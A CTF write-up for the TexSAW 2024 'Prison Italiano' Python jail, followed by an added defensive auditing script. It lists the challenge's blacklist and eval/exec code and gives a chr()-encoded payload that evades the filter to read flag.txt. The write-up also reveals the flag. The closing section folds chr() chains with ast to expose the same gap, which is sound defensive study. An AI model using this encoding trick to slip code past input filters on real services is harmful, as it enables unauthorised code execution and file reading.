Prison Italiano
2024-08-08 20:37:52 # Texsaw-CTF-2024

You’ve been locked in the worst prison imaginable: one without any meatballs! To escape the prison, you must read the flag using Python!

nc 3.23.56.243 9011


After playing around with it a bit, and getting various errors, here’s what I got:

blacklist: import, dir, print, open, ', ", os, sys, _, eval, exec, =, [, ]

prohibited actions:
function calls without parameters, i.e. '()'

code fragments:
inp = eval(inp)
inp = inp.replace("print", "stdout.write")
out = exec(inp)

The code fragments are the most important here. Notably, the input is passed to eval() first, and the result of that evaluation is what gets passed to exec()… let’s test if a function like chr() works.

Turns out, it does! That means we can just write every character as a chr(some number), which will allow us to print the file. Here’s a little script that helps us write our payload:

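payload = 'print(open("flag.txt","r").read())'
# Encode every character as chr(<code point>) and join the pieces with '+',
# so the result has no blacklisted substrings and no trailing '+'.
print('+'.join(f'chr({ord(i)})' for i in payload))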

And here’s our final payload:

chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(111)+chr(112)+chr(101)+chr(110)+chr(40)+chr(34)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)+chr(34)+chr(44)+chr(34)+chr(114)+chr(34)+chr(41)+chr(46)+chr(114)+chr(101)+chr(97)+chr(100)+chr(40)+chr(41)+chr(41)
texsaw{SP4P3GGY_4ND_M34TBA11S_aa17c6d30ee3942d}
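
Seen from the jail author's side, the filter only ever inspects the raw input, while exec() receives the string that eval() produces. The following is an added example (not part of the original write-up or the challenge source) that folds a pure chr() chain statically with ast and re-runs the blacklist from the notes above on the result; the function names and the harmless sample string are constructed for illustration.

```python
import ast

# Blacklist and the "()" rule, as listed in the notes above.
BLACKLIST = ["import", "dir", "print", "open", "'", '"', "os", "sys",
             "_", "eval", "exec", "=", "[", "]"]

def blocked_tokens(text):
    """Return the blacklist entries (plus '()') that occur in text."""
    hits = [tok for tok in BLACKLIST if tok in text]
    if "()" in text:
        hits.append("()")
    return hits

def fold_chr_chain(node):
    """Fold chr(<int>) + chr(<int>) + ... into a string without calling eval()."""
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return fold_chr_chain(node.left) + fold_chr_chain(node.right)
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id == "chr" and len(node.args) == 1
            and not node.keywords
            and isinstance(node.args[0], ast.Constant)
            and isinstance(node.args[0].value, int)):
        return chr(node.args[0].value)
    raise ValueError("not a pure chr() chain")

def audit(inp):
    """Check the raw input and, if it folds to a string, the text exec() would get."""
    stage1 = blocked_tokens(inp)
    try:
        stage2_text = fold_chr_chain(ast.parse(inp, mode="eval").body)
    except (SyntaxError, ValueError, OverflowError):
        stage2_text = None  # not a chr() chain; nothing to fold
    stage2 = blocked_tokens(stage2_text) if stage2_text is not None else []
    return {"stage1": stage1, "stage2_text": stage2_text, "stage2": stage2}

# Constructed sample: the same encoding applied to a harmless string.
SAMPLE_TEXT = 'print("ciao")'
SAMPLE = "+".join(f"chr({ord(c)})" for c in SAMPLE_TEXT)

if __name__ == "__main__":
    print(audit(SAMPLE))
```

An empty `stage1` next to a non-empty `stage2` is the gap this challenge relies on: the substring filter sees nothing, yet the string handed to exec() contains filtered tokens.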